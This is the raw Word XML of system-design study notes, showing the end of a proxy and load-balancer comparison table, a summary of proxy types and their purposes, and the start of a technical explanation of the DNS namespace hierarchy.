              <w:t>Both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242CFE" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Both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DEDD6C" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>L7 only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E14735" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>L7 only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D61F4" w:rsidRPr="003D61F4" w14:paraId="4CFC41B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A10AA5" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>gRPC support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224093" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Basic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13F8B5" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Full (native)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38FF29" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>No L7 gRPC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A1A5B5" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Full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5ED41E" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Full</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D61F4" w:rsidRPr="003D61F4" w14:paraId="58F392D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70DF06" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>HTTP/3 (QUIC)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2893BC" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Experimental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B89A18" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Yes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FC5BDD" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>No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5D229F" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Yes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0618D5" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D61F4" w:rsidRPr="003D61F4" w14:paraId="1D8C41F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5659A5" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Auto TLS (ACME)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B9C03E" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>No (external)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10F84B" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>No (external)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123322" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>No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4069AF" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Yes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23193E" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Yes (built-in)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D61F4" w:rsidRPr="003D61F4" w14:paraId="57AF433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CC0796" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Service mesh use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4BD152" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Rarely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AA09BD" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Primary (Istio)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444E0F" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Consul Connect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736A58" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Maesh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C38417" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>-</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D61F4" w:rsidRPr="003D61F4" w14:paraId="7C33BBC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B18AA9" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Observability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2169C3" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Access logs, basic metrics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E314C3" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Rich metrics, tracing, access logs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A05C27" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Detailed stats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FBF971" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Metrics, tracing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9D4383" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Metrics</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D61F4" w:rsidRPr="003D61F4" w14:paraId="3EE8CD8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B87EB0" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Use case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E11043" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>General purpose, high performance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39AA83" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Service mesh, modern infra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4F4B10" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Ultra-high performance L4/L7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FF9F2B" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Cloud-native, ease of use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8A2637" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Simple, automatic HTTPS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="042224DE" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:pict w14:anchorId="3968D0B1">
          <v:rect id="_x0000_i3336" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CED042F" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>21. Summary — The Mental Model</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60"/>
        <w:gridCol w:w="3197"/>
        <w:gridCol w:w="4193"/>
      </w:tblGrid>
      <w:tr w:rsidR="003D61F4" w:rsidRPr="003D61F4" w14:paraId="0322E7B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C64702" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D61F4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Proxy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9ED997" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D61F4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Direction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0E42BC" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D61F4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D61F4" w:rsidRPr="003D61F4" w14:paraId="3575B65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1FFA8B" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Forward proxy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DBA6FF" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Client → Proxy → Server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A2892F" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Client anonymity, content filtering, caching for clients</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D61F4" w:rsidRPr="003D61F4" w14:paraId="0B4FB3D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E17235" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:lastRenderedPageBreak/>
              <w:t>Reverse proxy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E76174" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Client → Proxy → Backend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925EE7" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Load balancing, TLS, caching, security, abstraction</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D61F4" w:rsidRPr="003D61F4" w14:paraId="57FDF65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B3E727" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Transparent proxy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B769AF" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Client → (intercepted) → Proxy → Server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5E1FFD" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Invisible interception, ISP caching, captive portals</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D61F4" w:rsidRPr="003D61F4" w14:paraId="37D6D3A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E041BF" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Sidecar proxy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470391" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>App ↔ Proxy ↔ Network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60C0F2" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Service mesh, mTLS, observability, reliability</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D61F4" w:rsidRPr="003D61F4" w14:paraId="5BC66D7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81F83E" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>API gateway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1D4F2B" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>External → Gateway → Internal services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730CFF" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Auth, rate limiting, transformation, routing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6661B44F" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The fundamental value of proxies in system design:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4F2B3E" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Proxies provide a </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>programmable interception layer</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> at network boundaries. This layer enables:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713ABC9E" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="709"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Decoupling</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> — clients and servers evolve independently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7562E418" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="709"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Security</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> — enforce policies without modifying applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD55FBB" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="709"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Performance</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> — caching, compression, connection pooling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC6823E" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="709"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Observability</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> — centralized logging, metrics, tracing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337F615C" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="709"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reliability</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> — retries, circuit breaking, failover.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C6E249" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="709"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Scalability</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> — load balancing, traffic shaping.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E3D885" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Every major architectural pattern in distributed systems — load balancing, CDN, service mesh, API gateway, WAF — is fundamentally built on the concept of a proxy. Understanding proxies deeply means understanding the connective tissue of modern infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0F031A" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="00397DF6" w:rsidRDefault="003D61F4" w:rsidP="00397DF6"/>
    <w:p w14:paraId="5323A696" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DA524B2" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DNS (Domain Name System) — Deep Technical Breakdown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437DCDAE" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:pict w14:anchorId="4A211D34">
          <v:rect id="_x0000_i3167" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C48605B" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What DNS Actually Is (Beyond "Phone Book")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA55C3A" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:lastRenderedPageBreak/>
        <w:t>The "phone book" analogy massively undersells DNS. DNS is a </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>globally distributed, hierarchically delegated, eventually consistent, fault-tolerant database</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> that handles over </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1 trillion queries per day</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t>. It is the backbone of the entire internet — if DNS fails, the internet functionally stops working even though all the servers are still running.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CFD664" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>DNS solves a fundamental problem: humans use </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>names</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> (www.google.com), computers use </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>addresses</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> (142.250.80.36). But more deeply, DNS solves the </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>scalability problem of mapping</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> — how do you maintain a globally consistent mapping of ~350 million domain names across billions of clients, with updates propagating worldwide, without a central server that would instantly become a catastrophic single point of failure?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21609272" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>The answer is a </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>tree-structured namespace with delegated authority at each level</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t>, combined with aggressive caching.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DEEA45" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:pict w14:anchorId="736A2AF4">
          <v:rect id="_x0000_i3168" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CE1E26" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. The Namespace Hierarchy — How It's Structured Internally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486783C7" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>The DNS namespace is a </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>tree</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t>. Every domain name is a path from a leaf to the root of this tree, read right-to-left.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46373951" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9EB1F7" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">                        . (root)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161E2CE5" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">                       / | \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAD10B4" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">                    com  org  net  uk  jp  ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7066961D" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">                   / | \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A99D6BD" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">               google amazon apple ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACFE268" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">              /    \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442D9024" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">            www    mail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FF7F56" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>www.google.com. — the trailing dot you rarely see is the </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>root label</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t>. Every fully qualified domain name (FQDN) technically ends with a dot representing the root. Browsers add it implicitly.</w:t>
      </w:r>
    </w:p>
